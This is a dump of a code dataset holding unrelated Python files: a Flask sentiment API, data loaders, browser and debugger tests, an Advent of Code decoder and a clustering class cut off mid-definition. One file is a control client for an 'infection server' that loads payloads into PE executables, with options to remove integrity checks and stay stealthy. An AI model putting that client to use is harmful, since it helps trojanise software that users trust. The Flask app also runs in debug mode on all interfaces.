id (string, 2–8 chars) | text (string, 16–264k chars) | dataset_id (string, 1 class)
---|---|---
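A minimal sketch of reading rows with this schema using the `datasets` library (the dataset path below is a hypothetical placeholder, not taken from this page):

from datasets import load_dataset

ds = load_dataset("user/python-code-dump", split="train")  # hypothetical path
row = ds[0]
print(row["id"], row["dataset_id"])
print(row["text"][:80])  # first characters of the code sample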
3479449
|
# Lesson5: writing to a file
# source: code/file_write.py
with open('test.txt', 'w') as f:
    f.write('Hello World!\n')
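# A possible follow-up (sketch, not part of the original lesson): read the
# file back to confirm the write.
with open('test.txt') as f:
    print(f.read())  # -> Hello World!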
|
StarcoderdataPython
|
11333810
|
from flask import Flask, render_template
from flask import jsonify
from flask import request
from SentimentNet import SentimentAnalyzer
SN = SentimentAnalyzer(cuda=False)
app = Flask(__name__)
@app.route("/sentiment", methods=['GET','POST'])
def sentiment():
    if request.method == "GET":
        sent = request.args.get('sentence')
        print(sent)
        s = SN([sent])
        return str(s.item())
    if request.method == "POST":
        sent = request.form['sentence']
        print("POST " + sent)
        s = SN([sent])
        return str(sent) + ":" + str(s.item())
if __name__ == "__main__":
    app.run(host='0.0.0.0', port=9090, debug=True)
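# Client sketch (illustrative, not from the original source; assumes the server
# above is running locally and that the `requests` package is installed):
#   import requests
#   r = requests.post("http://localhost:9090/sentiment", data={"sentence": "great movie"})
#   print(r.text)  # e.g. "great movie:0.93" -- the score shown here is hypothetical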
|
StarcoderdataPython
|
366912
|
<reponame>digital-land/view-builder<filename>view_builder/organisation_loader.py<gh_stars>0
import csv
from view_builder.model.table import Organisation, Entity
from sqlalchemy import create_engine
from sqlalchemy.orm import Session
from datetime import date
def load_organisations(path):
    engine = create_engine("sqlite+pysqlite:///{}".format(str(path)))
    with open("var/cache/organisation.csv", "r", newline="") as f, Session(
        engine
    ) as session:
        reader = csv.DictReader(f)
        counter = 1
        for row in reader:
            org = Organisation(
                entity_rel=Entity(
                    entity=counter, typology="organisation", dataset="organisation"
                ),
                organisation=row["organisation"],
                name=row["name"],
            )
            if row.get("entry-date", ""):
                org.entry_date = date.fromisoformat(row["entry-date"])
            if row.get("start-date", ""):
                org.start_date = date.fromisoformat(row["start-date"])
            if row.get("end-date", ""):
                org.end_date = date.fromisoformat(row["end-date"])
            session.add(org)
            counter = counter + 1
        session.commit()
if __name__ == "__main__":
    load_organisations(path="view_model.db")
|
StarcoderdataPython
|
11251589
|
#!/usr/bin/env python3
# import lib
import socket
import struct
# communication: control <-> infection server
#
# 0 1 5 n
# +----------------------------------------------------------------------------------------+
# | | | |
# | command | length | data |
# | | | |
# +----------------------------------------------------------------------------------------+
#
# command: 1 Byte
# length from data: 4 Byte
# data: n Byte
#
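# Illustration (added sketch, not from the original source): a "set data port"
# frame carrying the integer 4444 could be packed as
#   struct.pack("<BII", 0x09, 4, 4444)
# i.e. a 1-byte command, a 4-byte little-endian length, then the data. Note the
# implementation below additionally prefixes every frame with a 32-byte token.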
class LibPeProtocol:
    # Receive Commands
    CMD_RECEIVE_SUCCESS = 0xFD
    CMD_RECEIVE_ERROR = 0xFE
    # Send Commands
    CMD_SEND_ECHO = 0x01
    CMD_SEND_RESTART = 0x02
    CMD_SEND_SET_SECTION_NAME = 0x03
    CMD_SEND_SET_METHOD_CHANGE_FLAGS = 0x04
    CMD_SEND_SET_METHOD_NEW_SECTION = 0x05
    CMD_SEND_SET_METHOD_ALIGNMENT_RESIZE = 0x06
    CMD_SEND_SET_METHOD_ALIGNMENT = 0x07
    CMD_SEND_SET_REMOVE_INTEGRITY_CHECK = 0x08
    CMD_SEND_SET_DATA_PORT = 0x09
    CMD_SEND_SET_DATA_INTERFACE = 0x0A
    CMD_SEND_SET_CONTROL_PORT = 0x0B
    CMD_SEND_SET_CONTROL_INTERFACE = 0x0C
    CMD_SEND_SET_PAYLOAD_X86 = 0x0D
    CMD_SEND_SET_PAYLOAD_X64 = 0x0E
    CMD_SEND_GET_CONFIG = 0x0F
    CMD_SEND_SET_PAYLOAD_NAME_X86 = 0x10
    CMD_SEND_SET_TRY_STAY_STEALTH = 0x11
    CMD_SEND_SET_ENABLE = 0x12
    CMD_SEND_SET_RANDOM_SECTION_NAME = 0x13
    CMD_SEND_SHUTDOWN = 0x14
    CMD_SEND_SET_PAYLOAD_NAME_X64 = 0x15
    CMD_SEND_SET_METHOD_CROSS_SECTION_JUMP = 0x16
    CMD_SEND_SET_METHOD_CROSS_SECTION_JUMP_ITERATIONS = 0x17
    CMD_SEND_SET_ENCRYPT = 0x18
    CMD_SEND_SET_ENCRYPT_ITERATIONS = 0x19
    CMD_SEND_SET_TOKEN = 0x20
    # Command Type: Boolean (data = 1|0)
    CMD_SEND_PARAM_BOOL = [CMD_SEND_SET_METHOD_CHANGE_FLAGS,
                           CMD_SEND_SET_METHOD_NEW_SECTION,
                           CMD_SEND_SET_METHOD_ALIGNMENT_RESIZE,
                           CMD_SEND_SET_METHOD_ALIGNMENT,
                           CMD_SEND_SET_METHOD_CROSS_SECTION_JUMP,
                           CMD_SEND_SET_REMOVE_INTEGRITY_CHECK,
                           CMD_SEND_SET_DATA_INTERFACE,
                           CMD_SEND_SET_CONTROL_INTERFACE,
                           CMD_SEND_SET_RANDOM_SECTION_NAME,
                           CMD_SEND_SET_TRY_STAY_STEALTH,
                           CMD_SEND_SET_ENABLE,
                           CMD_SEND_SET_ENCRYPT]
    # Command Type: String (data = char-array)
    CMD_SEND_PARAM_STR = [CMD_SEND_SET_SECTION_NAME,
                          CMD_SEND_SET_PAYLOAD_NAME_X86,
                          CMD_SEND_SET_PAYLOAD_NAME_X64]
    # Command Type: Integer (data = int)
    CMD_SEND_PARAM_INT = [CMD_SEND_SET_DATA_PORT,
                          CMD_SEND_SET_CONTROL_PORT,
                          CMD_SEND_SET_METHOD_CROSS_SECTION_JUMP_ITERATIONS,
                          CMD_SEND_SET_ENCRYPT_ITERATIONS]
    # Command Type: Byte (data = File)
    CMD_SEND_PARAM_BYTE = [CMD_SEND_SET_PAYLOAD_X86,
                           CMD_SEND_SET_PAYLOAD_X64,
                           CMD_SEND_SET_TOKEN]
    # Command Type: Void (no data; length=0)
    CMD_SEND_PARAM_VOID = [CMD_SEND_RESTART,
                           CMD_SEND_SHUTDOWN,
                           CMD_SEND_GET_CONFIG]
    # init
    def __init__(self, token: str, host: str, port: int, timeout: int = 3, max_size: int = 8192) -> None:
        self.host = host
        self.port = port
        self.timeout = timeout
        self.max_size = max_size
        self.last_error = None
        self.token = b'\xaa\xaa' + 30 * b'\x00'
        self.set_token(token)
    # Get last error description
    def get_last_error(self) -> str:
        return self.last_error
    # Set access token
    def set_token(self, token) -> bool:
        byte_token = bytes.fromhex(token)
        if (len(byte_token) != 32) or (byte_token[:2] != b'\xaa\xaa'):
            return False
        self.token = byte_token
        return True
    # Sends command, returns result
    # return: None ... error
    #         byte array ... OK (== CMD_RECEIVE_SUCCESS)
    def send_command(self, command, data):
        # Build payload
        payload = self.token + bytes([command])
        if command in self.CMD_SEND_PARAM_BOOL:
            if type(data) is bool:
                payload += struct.pack("<I?", 1, data)
            else:
                self.last_error = "protocol error: boolean command: wrong payload type"
                return None
        elif command in self.CMD_SEND_PARAM_STR:
            if type(data) is str:
                payload += struct.pack("<I", len(data)) + data.encode("ASCII")
            else:
                self.last_error = "protocol error: string command: wrong payload type"
                return None
        elif command in self.CMD_SEND_PARAM_INT:
            if type(data) is int:
                payload += struct.pack("<II", 4, data)
            else:
                self.last_error = "protocol error: integer command: wrong payload type"
                return None
        elif command in self.CMD_SEND_PARAM_BYTE:
            if type(data) is bytes:
                payload += struct.pack("<I", len(data)) + data
            else:
                self.last_error = "protocol error: byte command: wrong payload type"
                return None
        elif command in self.CMD_SEND_PARAM_VOID:
            if data is None:
                payload += struct.pack("<I", 0)
            else:
                self.last_error = "protocol error: void command: wrong payload type"
                return None
        else:
            self.last_error = "protocol error: unknown command type"
            return None
        # Send the command; any error during network transmission is reported
        # via last_error
        try:
            # Open socket
            send_socket = socket.create_connection((self.host, self.port), self.timeout)
            # Send command to server
            if (send_socket is not None) and send_socket.send(payload):
                # Receive from server
                mem = send_socket.recv(self.max_size)
                # Close socket
                send_socket.close()
                if mem is not None:
                    if len(mem) > 32:
                        if mem[:32] == self.token:
                            if mem[32] == self.CMD_RECEIVE_SUCCESS:
                                # jeeee, SUCCESS!!!!!!
                                return mem[37:]  # return response (possibly an empty array)
                            else:
                                self.last_error = "protocol error: not received 'SUCCESS'"
                                return None
                        else:
                            self.last_error = "protocol error: invalid response token"
                            return None
                    else:
                        self.last_error = "protocol error: response too short"
                        return None
                else:
                    self.last_error = "protocol error: server is not responding"
                    return None
            else:
                self.last_error = "protocol error: no connection"
                return None
        except Exception:
            self.last_error = "protocol error: connection exception"
            return None
        # should never happen
        self.last_error = "protocol error: should never happen"
        return None
|
StarcoderdataPython
|
9790890
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from telemetry import decorators
from telemetry.internal.actions import action_runner as action_runner_module
from telemetry.testing import tab_test_case
class AndroidActionRunnerInteractionTest(tab_test_case.TabTestCase):
  @decorators.Enabled('android')
  def testSmoothScrollBy(self):
    self.Navigate('page_with_swipeables.html')
    action_runner = action_runner_module.ActionRunner(
        self._tab, skip_waits=True)
    self.assertEquals(action_runner.EvaluateJavaScript('window.scrollY'), 0)
    self.assertEquals(action_runner.EvaluateJavaScript('window.scrollX'), 0)
    platform = action_runner.tab.browser.platform
    app_ui = action_runner.tab.browser.GetAppUi()
    view = app_ui.WaitForUiNode(resource_id='compositor_view_holder')
    scroll_start1 = 0.5 * (view.bounds.center + view.bounds.bottom_right)
    platform.android_action_runner.SmoothScrollBy(scroll_start1.x,
                                                  scroll_start1.y, 'down', 300)
    self.assertTrue(action_runner.EvaluateJavaScript('window.scrollY') > 0)
    scroll_start2 = 0.5 * (view.bounds.center + view.bounds.top_left)
    platform.android_action_runner.SmoothScrollBy(scroll_start2.x,
                                                  scroll_start2.y, 'up', 500)
    self.assertTrue(action_runner.EvaluateJavaScript('window.scrollY') == 0)
  @decorators.Enabled('android')
  def testInputSwipe(self):
    self.Navigate('page_with_swipeables.html')
    action_runner = action_runner_module.ActionRunner(
        self._tab, skip_waits=True)
    self.assertEquals(action_runner.EvaluateJavaScript('window.scrollY'), 0)
    self.assertEquals(action_runner.EvaluateJavaScript('window.scrollX'), 0)
    platform = action_runner.tab.browser.platform
    app_ui = action_runner.tab.browser.GetAppUi()
    view = app_ui.WaitForUiNode(resource_id='compositor_view_holder')
    scroll_start1 = 0.5 * (view.bounds.center + view.bounds.bottom_right)
    scroll_end1 = scroll_start1.y - 300
    platform.android_action_runner.InputSwipe(scroll_start1.x, scroll_start1.y,
                                              scroll_start1.x, scroll_end1, 300)
    self.assertTrue(action_runner.EvaluateJavaScript('window.scrollY') > 0)
    scroll_start2 = 0.5 * (view.bounds.center + view.bounds.top_left)
    scroll_end2 = scroll_start2.y + 500
    platform.android_action_runner.InputSwipe(scroll_start2.x, scroll_start2.y,
                                              scroll_start2.x, scroll_end2, 500)
    self.assertTrue(action_runner.EvaluateJavaScript('window.scrollY') == 0)
  @decorators.Enabled('android')
  def testInputText(self):
    self.Navigate('blank.html')
    self._tab.ExecuteJavaScript(
        '(function() {'
        ' var elem = document.createElement("textarea");'
        ' document.body.appendChild(elem);'
        ' elem.focus();'
        '})();')
    action_runner = action_runner_module.ActionRunner(
        self._tab, skip_waits=True)
    platform = action_runner.tab.browser.platform
    platform.android_action_runner.InputText('Input spaces')
    platform.android_action_runner.InputText(', even multiple spaces')
    # Check that the contents of the textarea is correct. It might take some
    # time until keystrokes are handled on Android.
    self._tab.WaitForJavaScriptCondition(
        ('document.querySelector("textarea").value === '
         '"Input spaces, even multiple spaces"'),
        timeout=5)
|
StarcoderdataPython
|
1757718
|
<filename>tests/test_base_transforms.py
import solt.transforms as slt
import solt.core as slc
import numpy as np
import pytest
import sys
import inspect
import torch
from .fixtures import *
def get_transforms_solt():
    trfs = []
    for name, obj in inspect.getmembers(sys.modules["solt.transforms"]):
        if inspect.isclass(obj):
            trfs.append(obj)
    return trfs
def class_accepts(obj, parameter):
    return parameter in inspect.signature(obj.__init__).parameters.keys()
def filter_trfs(trfs, parameter):
    return filter(lambda t: class_accepts(t, parameter), trfs)
def filter_trfs_subclass(trfs, superclass):
    return filter(lambda t: issubclass(t, superclass), trfs)
all_trfs_solt = get_transforms_solt()
@pytest.mark.parametrize("trf", filter_trfs(all_trfs_solt, "data_indices"))
def test_data_indices_cant_be_list(trf):
    with pytest.raises(TypeError):
        trf(data_indices=[])
@pytest.mark.parametrize("trf", filter_trfs(all_trfs_solt, "p"))
def test_base_transform_can_take_none_prop_and_it_becomes_0_5(trf):
    assert 0.5 == trf(p=None).p
@pytest.mark.parametrize("trf", filter_trfs(all_trfs_solt, "data_indices"))
def test_data_indices_can_be_only_int(trf):
    with pytest.raises(TypeError):
        trf(data_indices=("2", 34))
@pytest.mark.parametrize("trf", filter_trfs(all_trfs_solt, "data_indices"))
def test_data_indices_can_be_only_nonnegative(trf):
    with pytest.raises(ValueError):
        trf(data_indices=(0, 1, -2))
@pytest.mark.parametrize("img", [img_2x2(), ])
@pytest.mark.parametrize("trf", filter_trfs(all_trfs_solt, "p"))
def test_transform_returns_original_data_if_use_transform_is_false(img, trf):
    dc = slc.DataContainer((img,), "I")
    trf = trf(p=0)
    res = trf(dc)
    np.testing.assert_array_equal(res.data[0], img)
@pytest.mark.parametrize("trf", [slt.Flip, slt.HSV, slt.Brightness])
@pytest.mark.parametrize("img", [img_3x3_rgb(), ])
def test_transform_returns_original_data_if_not_in_specified_indices(trf, img):
    img_3x3 = img * 128
    kpts_data = np.array([[0, 0], [0, 2], [2, 2], [2, 0]]).reshape((4, 2))
    kpts = slc.Keypoints(kpts_data.copy(), frame=(3, 3))
    dc = slc.DataContainer((img_3x3.copy(), img_3x3.copy(), img_3x3.copy(),
                            img_3x3.copy(), 1, kpts, 2), "IIIILPL")
    kwargs = {"p": 1, "data_indices": (0, 1, 4)}
    if class_accepts(trf, "gain_range"):
        kwargs["gain_range"] = (0.7, 0.9)
    if class_accepts(trf, "brightness_range"):
        kwargs["brightness_range"] = (10, 20)
    if class_accepts(trf, "h_range"):
        kwargs["h_range"] = (50, 50)
        kwargs["s_range"] = (50, 50)
    trf = trf(**kwargs)
    res = trf(dc)
    assert np.linalg.norm(res.data[0] - img_3x3) > 0
    assert np.linalg.norm(res.data[1] - img_3x3) > 0
    np.testing.assert_array_equal(res.data[2], img_3x3)
    np.testing.assert_array_equal(res.data[3], img_3x3)
    assert res.data[-1] == 2
    np.testing.assert_array_equal(res.data[5].data, kpts_data)
@pytest.mark.parametrize("img_1, img_2", [(img_2x2(), img_6x6()),
                                          (img_3x3(), img_3x4()), ])
def test_data_dep_trf_raises_value_error_when_imgs_are_of_different_size(img_1, img_2):
    trf = slt.SaltAndPepper(gain_range=0.0, p=1)
    with pytest.raises(ValueError):
        trf(slc.DataContainer((1, img_1.astype(np.uint8), img_2.astype(np.uint8)), "LII"))
@pytest.mark.parametrize("img", [img_2x2(), ])
def test_transform_returns_original_data_when_not_used_and_applied(img):
    trf = slt.Flip(p=0)
    dc = slc.DataContainer(img, "I")
    dc_res = trf(dc)
    assert dc_res == dc
@pytest.mark.parametrize("data", [[123, ], "123", 2.3])
def test_wrap_data_throws_a_type_error_when_unknown_type(data):
    with pytest.raises(TypeError):
        slc.BaseTransform.wrap_data(data)
@pytest.mark.parametrize("data", [img_2x2(), slc.DataContainer(img_2x2(), "I")])
def test_data_container_wraps_correctly(data):
    dc = slc.DataContainer(img_2x2(), "I")
    assert slc.BaseTransform.wrap_data(data) == dc
@pytest.mark.parametrize("img", [img_3x3(), ])
@pytest.mark.parametrize("return_torch", [False, True])
@pytest.mark.parametrize("trf", filter(lambda t: not issubclass(t, slt.HSV), all_trfs_solt))
def test_transforms_return_torch(img, trf, return_torch):
    if "p" in inspect.getfullargspec(trf.__init__).args:
        trf: slc.BaseTransform = trf(p=1)
    else:
        trf: slc.BaseTransform = trf()
    res = trf({"image": img},
              return_torch=return_torch, as_dict=False,
              mean=(0.5,), std=(0.5,))
    assert isinstance(res, torch.FloatTensor) == return_torch
|
StarcoderdataPython
|
1859188
|
<reponame>jorgenwh/npstructures<filename>profiling/counter.py
import numpy as np
import cProfile
import pstats
from npstructures import RaggedArray, Counter
import time
N=5
hashes = (np.load(f"/home/knut/Sources/kmer_mapper/h{i}.npy") for i in range(N))
ragged = RaggedArray.load("profiling/.fullragged.npz")
#agged = RaggedArray.load("profiling/.new_fullragged.npz")
# ragged.save("profiling/.new_fullragged.npz")
counter = Counter(ragged, safe_mode=False)
# h = next(hashes)
# counter.count(np.insert(ragged._data, 0, 5))
p_stats_name = "profiling/.count.txt"
if True:
    for h in hashes:
        counter.count(h)
    exit()
cProfile.run("[counter.count(h) for h in hashes]", p_stats_name)
stats = pstats.Stats(p_stats_name)
# stats.sort_stats("tottime")
stats.sort_stats("cumulative")
stats.print_stats()
|
StarcoderdataPython
|
3498357
|
"""
*Natural Logarithm*
"""
from dataclasses import dataclass
import jax.numpy as jnp
from ._operator import Logarithm
__all__ = ["NaturalLogarithm"]
@dataclass
class NaturalLogarithm(
    Logarithm,
):
    operator = jnp.log
|
StarcoderdataPython
|
3204238
|
<reponame>mkinsner/llvm
"""Show bitfields and check that they display correctly."""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class CppBitfieldsTestCase(TestBase):
    mydir = TestBase.compute_mydir(__file__)
    @no_debug_info_test
    def test_bitfields(self):
        self.build()
        lldbutil.run_to_source_breakpoint(self, '// break here',
                                          lldb.SBFileSpec("main.cpp", False))
        # Accessing LargeBitsA.
        self.expect_expr("lba", result_children=[
            ValueCheck(name="", type="int:32"),
            ValueCheck(name="a", type="unsigned int:20", value="2")
        ])
        self.expect_expr("lba.a", result_type="unsigned int", result_value="2")
        # Accessing LargeBitsB.
        self.expect_expr("lbb", result_children=[
            ValueCheck(name="a", type="unsigned int:1", value="1"),
            ValueCheck(name="", type="int:31"),
            ValueCheck(name="b", type="unsigned int:20", value="3")
        ])
        self.expect_expr("lbb.b", result_type="unsigned int", result_value="3")
        # Accessing LargeBitsC.
        self.expect_expr("lbc", result_children=[
            ValueCheck(name="", type="int:22"),
            ValueCheck(name="a", type="unsigned int:1", value="1"),
            ValueCheck(name="b", type="unsigned int:1", value="0"),
            ValueCheck(name="c", type="unsigned int:5", value="4"),
            ValueCheck(name="d", type="unsigned int:1", value="1"),
            ValueCheck(name="", type="int:2"),
            ValueCheck(name="e", type="unsigned int:20", value="20"),
        ])
        self.expect_expr("lbc.c", result_type="unsigned int", result_value="4")
        # Accessing LargeBitsD.
        self.expect_expr("lbd", result_children=[
            ValueCheck(name="arr", type="char[3]", summary='"ab"'),
            ValueCheck(name="", type="int:32"),
            ValueCheck(name="a", type="unsigned int:20", value="5")
        ])
        self.expect_expr("lbd.a", result_type="unsigned int", result_value="5")
        # Test BitfieldsInStructInUnion.
        # FIXME: This needs some more explanation for what it's actually testing.
        nested_struct_children = [
            ValueCheck(name="", type="int:22"),
            ValueCheck(name="a", type="uint64_t:1", value="1"),
            ValueCheck(name="b", type="uint64_t:1", value="0"),
            ValueCheck(name="c", type="uint64_t:1", value="1"),
            ValueCheck(name="d", type="uint64_t:1", value="0"),
            ValueCheck(name="e", type="uint64_t:1", value="1"),
            ValueCheck(name="f", type="uint64_t:1", value="0"),
            ValueCheck(name="g", type="uint64_t:1", value="1"),
            ValueCheck(name="h", type="uint64_t:1", value="0"),
            ValueCheck(name="i", type="uint64_t:1", value="1"),
            ValueCheck(name="j", type="uint64_t:1", value="0"),
            ValueCheck(name="k", type="uint64_t:1", value="1")
        ]
        self.expect_expr("bitfields_in_struct_in_union",
                         result_type="BitfieldsInStructInUnion",
                         result_children=[ValueCheck(name="", children=[
                             ValueCheck(name="f", children=nested_struct_children)
                         ])]
                         )
        self.expect_expr("bitfields_in_struct_in_union.f.a",
                         result_type="uint64_t", result_value="1")
        # Unions with bitfields.
        self.expect_expr("uwbf", result_type="UnionWithBitfields", result_children=[
            ValueCheck(name="a", value="255"),
            ValueCheck(name="b", value="65535"),
            ValueCheck(name="c", value="4294967295"),
            ValueCheck(name="x", value="4294967295")
        ])
        self.expect_expr("uwubf", result_type="UnionWithUnnamedBitfield",
                         result_children=[
                             ValueCheck(name="a", value="16777215"),
                             ValueCheck(name="x", value="4294967295")
                         ]
                         )
        # Class with a base class and a bitfield.
        self.expect_expr("derived", result_type="Derived", result_children=[
            ValueCheck(name="Base", children=[
                ValueCheck(name="b_a", value="2", type="uint32_t")
            ]),
            ValueCheck(name="d_a", value="1", type="uint32_t:1")
        ])
        # Struct with bool bitfields.
        self.expect_expr("bb", result_type="", result_children=[
            ValueCheck(name="a", value="true", type="bool:1"),
            ValueCheck(name="b", value="false", type="bool:1"),
            ValueCheck(name="c", value="true", type="bool:2"),
            ValueCheck(name="d", value="true", type="bool:2")
        ])
        bb = self.frame().FindVariable('bb')
        self.assertSuccess(bb.GetError())
        bb_a = bb.GetChildAtIndex(0)
        self.assertSuccess(bb_a.GetError())
        self.assertEqual(bb_a.GetValueAsUnsigned(), 1)
        self.assertEqual(bb_a.GetValueAsSigned(), 1)
        bb_b = bb.GetChildAtIndex(1)
        self.assertSuccess(bb_b.GetError())
        self.assertEqual(bb_b.GetValueAsUnsigned(), 0)
        self.assertEqual(bb_b.GetValueAsSigned(), 0)
        bb_c = bb.GetChildAtIndex(2)
        self.assertSuccess(bb_c.GetError())
        self.assertEqual(bb_c.GetValueAsUnsigned(), 1)
        self.assertEqual(bb_c.GetValueAsSigned(), 1)
        bb_d = bb.GetChildAtIndex(3)
        self.assertSuccess(bb_d.GetError())
        self.assertEqual(bb_d.GetValueAsUnsigned(), 1)
        self.assertEqual(bb_d.GetValueAsSigned(), 1)
        # Test a class with a base class that has a vtable ptr. The derived
        # class has bitfields.
        base_with_vtable_children = [
            ValueCheck(name="a", type="unsigned int:4", value="5"),
            ValueCheck(name="b", type="unsigned int:4", value="0"),
            ValueCheck(name="c", type="unsigned int:4", value="5")
        ]
        self.expect_expr("base_with_vtable", result_children=base_with_vtable_children)
        self.expect_var_path("base_with_vtable", children=base_with_vtable_children)
    @no_debug_info_test
    def test_bitfield_behind_vtable_ptr(self):
        self.build()
        lldbutil.run_to_source_breakpoint(self, '// break here',
                                          lldb.SBFileSpec("main.cpp", False))
        # Test a class with a vtable ptr and bitfields.
        with_vtable_children = [
            ValueCheck(name="a", type="unsigned int:4", value="5"),
            ValueCheck(name="b", type="unsigned int:4", value="0"),
            ValueCheck(name="c", type="unsigned int:4", value="5")
        ]
        self.expect_expr("with_vtable", result_children=with_vtable_children)
        self.expect_var_path("with_vtable", children=with_vtable_children)
        # Test a class with a vtable ptr and unnamed bitfield directly after.
        with_vtable_and_unnamed_children = [
            ValueCheck(name="", type="int:4", value="0"),
            ValueCheck(name="b", type="unsigned int:4", value="0"),
            ValueCheck(name="c", type="unsigned int:4", value="5")
        ]
        self.expect_expr("with_vtable_and_unnamed",
                         result_children=with_vtable_and_unnamed_children)
        self.expect_var_path("with_vtable_and_unnamed",
                             children=with_vtable_and_unnamed_children)
|
StarcoderdataPython
|
1890914
|
<reponame>stetsonbost/MediaSocial<filename>MediaSocial/catalog/migrations/0006_auto_20180413_1527.py
# Generated by Django 2.0.3 on 2018-04-13 22:27
import datetime
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('catalog', '0005_movies_music_television_visual'),
    ]
    operations = [
        migrations.AddField(
            model_name='reply',
            name='user',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
        migrations.AlterField(
            model_name='movies',
            name='release_date',
            field=models.DateField(default=datetime.date(2018, 4, 13)),
        ),
        migrations.AlterField(
            model_name='television',
            name='first_air_date',
            field=models.DateField(default=datetime.date(2018, 4, 13)),
        ),
        migrations.AlterField(
            model_name='visual',
            name='creator',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='catalog.Author'),
        ),
    ]
|
StarcoderdataPython
|
1688011
|
<filename>2021/day16.py
from __future__ import annotations
from dataclasses import dataclass
import functools
from aoc_tools import grouper
@dataclass
class Packet:
    version: int
    typ: int
    val: int | list[Packet]
    @classmethod
    def from_file(cls, fobj):
        version = fobj.read_bits(3)
        typ = fobj.read_bits(3)
        if typ == 4:
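            # Literal value: read 5-bit groups; the high bit of each group
            # flags continuation and the low 4 bits extend the number.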
            val = 0
            while True:
                bits = fobj.read_bits(5)
                val = (val << 4) | (bits & 0xf)
                if not bits & 0x10:
                    break
            return cls(version, typ, val)
        else:
            # Operator
            if fobj.read_bits(1):
                num_packets = fobj.read_bits(11)
                subs = [Packet.from_file(fobj) for _ in range(num_packets)]
            else:
                num_bits = fobj.read_bits(15)
                start = fobj.bit_offset
                subs = []
                while fobj.bit_offset < start + num_bits:
                    subs.append(Packet.from_file(fobj))
            return cls(version, typ, subs)
    @classmethod
    def from_string(cls, s):
        return cls.from_file(BitReader(s))
    @property
    def total_version(self):
        return self.version + (0 if self.typ == 4 else sum(p.total_version for p in self.val))
    @property
    def value(self):
        match self.typ:
            case 0:
                return sum(p.value for p in self.val)
            case 1:
                return functools.reduce(lambda prod, p: prod * p.value, self.val, 1)
            case 2:
                return min(p.value for p in self.val)
            case 3:
                return max(p.value for p in self.val)
            case 4:
                return self.val
            case 5:
                return int(self.val[0].value > self.val[1].value)
            case 6:
                return int(self.val[0].value < self.val[1].value)
            case 7:
                return int(self.val[0].value == self.val[1].value)
            case _:
                raise NotImplementedError(f'Unknown packet type {self.typ}')
class BitReader:
    def __init__(self, s, chunk_size=64):
        self.chunk_size = (chunk_size // 4) * 4
        self.bit_buffer = 0
        self.bits_left = 0
        self.bit_offset = 0
        self.buffer = map(lambda a: int(''.join(a), 16),
                          grouper(s, self.chunk_size // 4, '0'))
    def ensure_bits(self, bits):
        while bits > self.bits_left:
            self.bit_buffer = (self.bit_buffer << self.chunk_size) | next(self.buffer)
            self.bits_left += self.chunk_size
    def read_bits(self, bits):
        self.ensure_bits(bits)
        self.bit_offset += bits
        # Grab as much as we need to return
        self.bits_left -= bits
        ret = self.bit_buffer >> self.bits_left
        # Keep only what hasn't been used
        self.bit_buffer &= (2 ** self.bits_left - 1)
        return ret
def run(data):
    packet = Packet.from_string(data)
    return packet.total_version, packet.value
if __name__ == '__main__':
    from aocd.models import Puzzle
    fobj = BitReader('38006F45291200')
    fobj.read_bits(3)
    assert fobj.bit_offset == 3
    fobj.read_bits(8)
    assert fobj.bit_offset == 11
    fobj.read_bits(25)
    assert fobj.bit_offset == 36
    p = Packet.from_string('D2FE28')
    assert p.version == 6
    assert p.typ == 4
    assert p.val == 2021
    p = Packet.from_string('38006F45291200')
    assert p.version == 1
    assert p.typ == 6
    assert len(p.val) == 2
    assert p.val[0].val == 10
    assert p.val[1].val == 20
    p = Packet.from_string('EE00D40C823060')
    assert p.version == 7
    assert p.typ == 3
    assert len(p.val) == 3
    assert p.val[0].val == 1
    assert p.val[1].val == 2
    assert p.val[2].val == 3
    assert Packet.from_string('8A004A801A8002F478').total_version == 16
    assert Packet.from_string('620080001611562C8802118E34').total_version == 12
    assert Packet.from_string('C0015000016115A2E0802F182340').total_version == 23
    assert Packet.from_string('A0016C880162017C3686B18A3D4780').total_version == 31
    assert Packet.from_string('C200B40A82').value == 3
    assert Packet.from_string('04005AC33890').value == 54
    assert Packet.from_string('880086C3E88112').value == 7
    assert Packet.from_string('CE00C43D881120').value == 9
    assert Packet.from_string('D8005AC2A8F0').value == 1
    assert Packet.from_string('F600BC2D8F').value == 0
    assert Packet.from_string('9C005AC2F8F0').value == 0
    assert Packet.from_string('9C0141080250320F1802104A08').value == 1
    test_a, _ = run('A0016C880162017C3686B18A3D4780')
    assert test_a == 31
    _, test_b = run('9C0141080250320F1802104A08')
    assert test_b == 1
    puz = Puzzle(2021, 16)
    part_a, part_b = run(puz.input_data)
    puz.answer_a = part_a
    print(f'Part 1: {puz.answer_a}')
    puz.answer_b = part_b
    print(f'Part 2: {puz.answer_b}')
|
StarcoderdataPython
|
3382165
|
"""
.. module:: SimpleConsensusClustering
SimpleConsensusClustering
*************
:Description: SimpleConsensusClustering
:Authors: bejar
:Version:
:Created on: 22/01/2015 10:46
"""
__author__ = 'bejar'
import numpy as np
from sklearn.base import BaseEstimator, ClusterMixin, TransformerMixin
from sklearn.metrics.pairwise import euclidean_distances
from sklearn.cluster import KMeans, SpectralClustering
from numpy.random import randint
class SimpleConsensusClustering(BaseEstimator, ClusterMixin, TransformerMixin):
"""Simple Consensus Clustering Algorithm
Pararemeters:
n_clusters: int
Number of clusters of the base clusterers and the consensus cluster
base: string
base clusterer ['kmeans']
n_components: int
number of components of the consensus
consensus: string
consensus method ['coincidence']
"""
def __init__(self, n_clusters, n_clusters_base=None, ncb_rand=False, base='kmeans', n_components=10,
consensus='coincidence', consensus2='kmeans'):
self.n_clusters = n_clusters
if n_clusters_base is None:
self.n_clusters_base = n_clusters
else:
self.n_clusters_base = n_clusters_base
self.ncb_rand = ncb_rand
self.cluster_centers_ = None
self.labels_ = None
self.cluster_sizes_ = None
self.base = base
self.n_components = n_components
self.consensus = consensus
self.consensus2 = consensus2
def fit(self, X):
"""
Clusters the examples
:param X:
:return:
"""
if self.consensus == 'coincidence':
self.cluster_centers_, self.labels_ = self._fit_process_coincidence(X)
def _fit_process_coincidence(self, X):
"""
